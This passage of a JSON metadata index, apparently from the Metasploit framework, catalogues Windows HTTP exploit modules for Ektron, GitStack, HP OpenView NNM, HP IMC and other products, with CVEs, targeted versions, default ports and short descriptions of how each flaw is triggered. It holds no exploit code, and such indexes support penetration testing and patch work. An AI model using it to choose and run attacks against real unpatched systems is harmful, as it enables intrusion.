"ref_name": "windows/http/efs_fmws_userid_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ektron_xslt_exec": {
"name": "Ektron 8.02 XSLT Transform Remote Code Execution",
"full_name": "exploit/windows/http/ektron_xslt_exec",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Rich Lundeen",
"juan vazquez <juan.vazquez@metasploit.com>",
"Nicolas \"Nicob\" Gregoire"
],
"description": "This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The\n vulnerability exists due to the insecure usage of XslCompiledTransform, using a\n XSLT controlled by the user. The module has been tested successfully on Ektron CMS\n 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK\n SERVICE privileges.",
"references": [
"CVE-2012-5357",
"OSVDB-88107",
"URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/",
"URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2003 SP2 / Ektron CMS400 8.02"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ektron_xslt_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/ektron_xslt_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ektron_xslt_exec_ws": {
"name": "Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution",
"full_name": "exploit/windows/http/ektron_xslt_exec_ws",
"rank": 600,
"disclosure_date": "2015-02-05",
"type": "exploit",
"author": [
"catatonicprime"
],
"description": "Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have\nvulnerabilities in various operations within the ServerControlWS.asmx\nweb services. These vulnerabilities allow for RCE without authentication and\nexecute in the context of IIS on the remote system.",
"references": [
"CVE-2015-0923",
"US-CERT-VU-377644",
"URL-http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2008 R2 / Ektron CMS400 8.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ektron_xslt_exec_ws.rb",
"is_install_path": true,
"ref_name": "windows/http/ektron_xslt_exec_ws",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ericom_access_now_bof": {
"name": "Ericom AccessNow Server Buffer Overflow",
"full_name": "exploit/windows/http/ericom_access_now_bof",
"rank": 300,
"disclosure_date": "2014-06-02",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in Ericom AccessNow Server. The\n vulnerability is due to an insecure usage of vsprintf with user controlled data,\n which can be triggered with a malformed HTTP request. This module has been tested\n successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003\n Server SP2.",
"references": [
"ZDI-14-160",
"CVE-2014-3913",
"BID-67777",
"URL-http://www.ericom.com/security-ERM-2014-610.asp"
],
"platform": "Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ericom_access_now_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/ericom_access_now_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ezserver_http": {
"name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability",
"full_name": "exploit/windows/http/ezserver_http",
"rank": 600,
"disclosure_date": "2012-06-18",
"type": "exploit",
"author": [
"modpr0be <modpr0be@spentera.com>"
],
"description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.",
"references": [
"OSVDB-83065",
"BID-54056",
"EDB-19266",
"URL-http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ezserver_http.rb",
"is_install_path": true,
"ref_name": "windows/http/ezserver_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/fdm_auth_header": {
"name": "Free Download Manager Remote Control Server Buffer Overflow",
"full_name": "exploit/windows/http/fdm_auth_header",
"rank": 500,
"disclosure_date": "2009-02-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Free Download Manager\n Remote Control 2.5 Build 758. When sending a specially crafted\n Authorization header, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-0183",
"OSVDB-51745"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Free Download Manager 2.5 Build 758"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/fdm_auth_header.rb",
"is_install_path": true,
"ref_name": "windows/http/fdm_auth_header",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/generic_http_dll_injection": {
"name": "Generic Web Application DLL Injection",
"full_name": "exploit/windows/http/generic_http_dll_injection",
"rank": 0,
"disclosure_date": "2015-03-04",
"type": "exploit",
"author": [
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This is a general-purpose module for exploiting conditions where a HTTP request\n triggers a DLL load from an specified SMB share. This module serves payloads as\n DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would\n trigger the load of the DLL.",
"references": [
"CWE-427"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2019-01-29 11:08:14 +0000",
"path": "/modules/exploits/windows/http/generic_http_dll_injection.rb",
"is_install_path": true,
"ref_name": "windows/http/generic_http_dll_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/geutebrueck_gcore_x64_rce_bo": {
"name": "Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE",
"full_name": "exploit/windows/http/geutebrueck_gcore_x64_rce_bo",
"rank": 300,
"disclosure_date": "2017-01-24",
"type": "exploit",
"author": [
"Luca Cappiello",
"Maurice Popp"
],
"description": "This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe).\n The vulnerable webserver is running on Port 13003 and Port 13004, does not require\n authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).",
"references": [
"EDB-41153",
"CVE-2017-11517",
"URL-www.geutebrueck.com"
],
"platform": "Windows",
"arch": "",
"rport": 13003,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"GCore 1.3.8.42, Windows x64 (Win7+)",
"GCore 1.4.2.37, Windows x64 (Win7+)"
],
"mod_time": "2017-11-08 20:21:40 +0000",
"path": "/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb",
"is_install_path": true,
"ref_name": "windows/http/geutebrueck_gcore_x64_rce_bo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/gitstack_rce": {
"name": "GitStack Unsanitized Argument RCE",
"full_name": "exploit/windows/http/gitstack_rce",
"rank": 500,
"disclosure_date": "2018-01-15",
"type": "exploit",
"author": [
"Kacper Szurek",
"Jacob Robles"
],
"description": "This module exploits a remote code execution vulnerability that\n exists in GitStack through v2.3.10, caused by an unsanitized argument\n being passed to an exec function call. This module has been tested\n on GitStack v2.3.10.",
"references": [
"CVE-2018-5955",
"EDB-43777",
"EDB-44044",
"URL-https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-03-09 07:31:55 +0000",
"path": "/modules/exploits/windows/http/gitstack_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/gitstack_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_autopass_license_traversal": {
"name": "HP AutoPass License Server File Upload",
"full_name": "exploit/windows/http/hp_autopass_license_traversal",
"rank": 500,
"disclosure_date": "2014-01-10",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP AutoPass License Server. It abuses two\n weaknesses in order to get its objective. First, the AutoPass application doesn't enforce\n authentication in the CommunicationServlet component. Second, it's possible to abuse a\n directory traversal when uploading files thorough the same component, allowing to upload\n an arbitrary payload embedded in a JSP. The module has been tested successfully on\n HP AutoPass License Server 8.01 as installed with HP Service Virtualization 3.50.",
"references": [
"CVE-2013-6221",
"ZDI-14-195",
"BID-67989",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04333125"
],
"platform": "Java",
"arch": "java",
"rport": 5814,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2003 SP2 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50",
"Windows 2008 32 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50",
"Windows 2008 64 bits/ HP AutoPass License Server 8.01 / HP Service Virtualization 3.50",
"Windows 2012 / HP AutoPass License Server 8.01 / HP Service Virtualization 3.50"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_autopass_license_traversal.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_autopass_license_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_imc_bims_upload": {
"name": "HP Intelligent Management Center BIMS UploadServlet Directory Traversal",
"full_name": "exploit/windows/http/hp_imc_bims_upload",
"rank": 600,
"disclosure_date": "2013-10-08",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS\n component from the HP Intelligent Management Center. The vulnerability exists in the\n UploadServlet, allowing the user to download and upload arbitrary files. This module has\n been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows\n 2003 SP2.",
"references": [
"CVE-2013-4822",
"OSVDB-98247",
"BID-62895",
"ZDI-13-238",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425"
],
"platform": "Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_imc_bims_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_imc_bims_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_imc_java_deserialize": {
"name": "HP Intelligent Management Java Deserialization RCE",
"full_name": "exploit/windows/http/hp_imc_java_deserialize",
"rank": 600,
"disclosure_date": "2017-10-03",
"type": "exploit",
"author": [
"Steven Seeley (mr_me) of Offensive Security",
"Carsten <Carsten @MaartmannMoe / cmm@transcendentgroup.com>"
],
"description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of\n Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required to exploit\n this vulnerability.\n\n The specific flaw exists within the WebDMDebugServlet, which listens on TCP ports 8080 and 8443 by\n default. The issue results from the lack of proper validation of user-supplied data, which can result\n in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary\n code in the context of SYSTEM.",
"references": [
"CVE-2017-12557",
"URL-https://github.com/pimps/ysoserial-modified/blob/master/src/main/java/ysoserial/payloads/JSON1.java",
"URL-https://www.zerodayinitiative.com/advisories/ZDI-17-832/"
],
"platform": "Windows",
"arch": "",
"rport": "8080",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HPE IMC 7.3 E0504P2 and earlier / Windows"
],
"mod_time": "2018-12-18 15:17:51 +0000",
"path": "/modules/exploits/windows/http/hp_imc_java_deserialize.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_imc_java_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_imc_mibfileupload": {
"name": "HP Intelligent Management Center Arbitrary File Upload",
"full_name": "exploit/windows/http/hp_imc_mibfileupload",
"rank": 500,
"disclosure_date": "2013-03-07",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in HP Intelligent Management Center.\n The vulnerability exists in mibFileUpload, which accepts unauthenticated\n file uploads and handles zip contents in an insecure way. By combining both weaknesses,\n a remote attacker can achieve arbitrary file upload. This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5201",
"OSVDB-91026",
"BID-58385",
"ZDI-13-050",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276"
],
"platform": "Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP Intelligent Management Center 5.1 E0202 / Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_imc_mibfileupload.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_imc_mibfileupload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_loadrunner_copyfiletoserver": {
"name": "HP LoadRunner EmulationAdmin Web Service Directory Traversal",
"full_name": "exploit/windows/http/hp_loadrunner_copyfiletoserver",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in version 11.52 of HP\n LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically\n in the copyFileToServer method, allowing the upload of arbitrary files. This module has\n been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2.",
"references": [
"CVE-2013-4837",
"OSVDB-99231",
"BID-63475",
"ZDI-13-259",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437"
],
"platform": "Windows",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP LoadRunner 11.52"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_loadrunner_copyfiletoserver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_mpa_job_acct": {
"name": "HP Managed Printing Administration jobAcct Remote Command Execution",
"full_name": "exploit/windows/http/hp_mpa_job_acct",
"rank": 600,
"disclosure_date": "2011-12-21",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability on HP Managed Printing\n Administration 2.6.3 and prior versions. The vulnerability exists in the UploadFiles()\n function from the MPAUploader.Uploader.1 control, loaded and used by the server.\n The function can be abused via directory traversal and null byte injection in order\n to achieve arbitrary file upload. In order to exploit successfully, a few conditions\n must be met. First, a writable location under the context of Internet Guest Account\n (IUSR_*) or Everyone is required. By default, this module will attempt to write to\n /hpmpa/userfiles/, but the WRITEWEBFOLDER option can be used to provide\n another writable path. Second, the writable path must also be readable by a browser,\n so this typically means a location under wwwroot. Finally, you cannot overwrite\n a file with the same name as the payload.",
"references": [
"CVE-2011-4166",
"OSVDB-78015",
"BID-51174",
"ZDI-11-352",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_mpa_job_acct.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_mpa_job_acct",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_getnnmdata_hostname": {
"name": "HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_getnnmdata_hostname",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending a specially crafted Hostname parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-1555",
"OSVDB-64976"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50",
"HP OpenView Network Node Manager 7.53"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_getnnmdata_hostname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_getnnmdata_icount": {
"name": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_getnnmdata_icount",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending a specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-1554",
"OSVDB-64976"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50",
"HP OpenView Network Node Manager 7.53"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_getnnmdata_icount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_getnnmdata_maxage": {
"name": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_getnnmdata_maxage",
"rank": 500,
"disclosure_date": "2010-05-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending a specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-1553",
"OSVDB-64976"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.50",
"HP OpenView Network Node Manager 7.53"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_getnnmdata_maxage",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_nnmrptconfig_nameparams": {
"name": "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_nnmrptconfig_nameparams",
"rank": 300,
"disclosure_date": "2011-01-10",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n A remote user can send a long data string to the nameParams parameter via\n a POST request, which causes an overflow on the stack when the function\n ov.sprintf_new() is used, and gain arbitrary code execution.",
"references": [
"CVE-2011-0266",
"OSVDB-70473",
"ZDI-11-008"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"HP NNM 7.53 Windows Server 2003 Enterprise",
"HP OpenView Network Node Manager 7.50"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_nnmrptconfig_nameparams",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_nnmrptconfig_schdparams": {
"name": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_nnmrptconfig_schdparams",
"rank": 300,
"disclosure_date": "2011-01-10",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.",
"references": [
"CVE-2011-0267",
"OSVDB-70473",
"ZDI-11-009"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NNM 7.53 - Windows Server 2003 Ent"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_nnmrptconfig_schdparams",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_openview5": {
"name": "HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_openview5",
"rank": 500,
"disclosure_date": "2007-12-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-6204",
"OSVDB-39530",
"BID-26741"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HP OpenView Network Node Manager 7.50 / Windows 2000 All"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_openview5.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_openview5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovalarm_lang": {
"name": "HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovalarm_lang",
"rank": 500,
"disclosure_date": "2009-12-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n arbitrary code.\n\n This specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n function within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n HTTP request that contains the following.\n\n 1. An \"Accept-Language\" header longer than 100 bytes\n 2. An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n The vulnerability is related to \"_WebSession::GetWebLocale()\".\n\n NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.",
"references": [
"CVE-2009-4179",
"OSVDB-60930",
"BID-37347",
"URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12",
"URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53",
"HP OpenView Network Node Manager 7.53 (Windows 2003)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovalarm_lang",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovas": {
"name": "HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovas",
"rank": 400,
"disclosure_date": "2008-04-02",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"muts"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n Specifically, this vulnerability is caused by a failure to properly handle user-supplied input within the\n HTTP request, including headers and the actual URL GET request.\n\n Exploitation is tricky due to character restrictions. It was necessary to utilize an egghunter shellcode\n which was alphanumeric encoded by muts in the original exploit.\n\n If you plan on using this exploit for a remote shell, you will likely want to migrate to a different process\n as soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n handling code that causes this.",
"references": [
"CVE-2008-1697",
"OSVDB-43992",
"BID-28569"
],
"platform": "Windows",
"arch": "",
"rport": 7510,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Windows 2003/zip.dll OpenView 7.53",
"Windows 2000/jvm.dll OpenView NNM 7.51"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovas.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovas",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/hp_nnm_ovbuildpath_textfile": {
"name": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",
"full_name": "exploit/windows/http/hp_nnm_ovbuildpath_textfile",
"rank": 300,
"disclosure_date": "2011-11-01",
"type": "exploit",
"author": [
"Anyway <Aniway.Anyway@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. If the installation path cannot be guessed the default installation path\n is used.",
"references": [
"CVE-2011-3167",
"OSVDB-76775",
"BID-50471",
"ZDI-12-002",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb",
"is_install_path": true,
"ref_name": "windows/http/hp_nnm_ovbuildpath_textfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
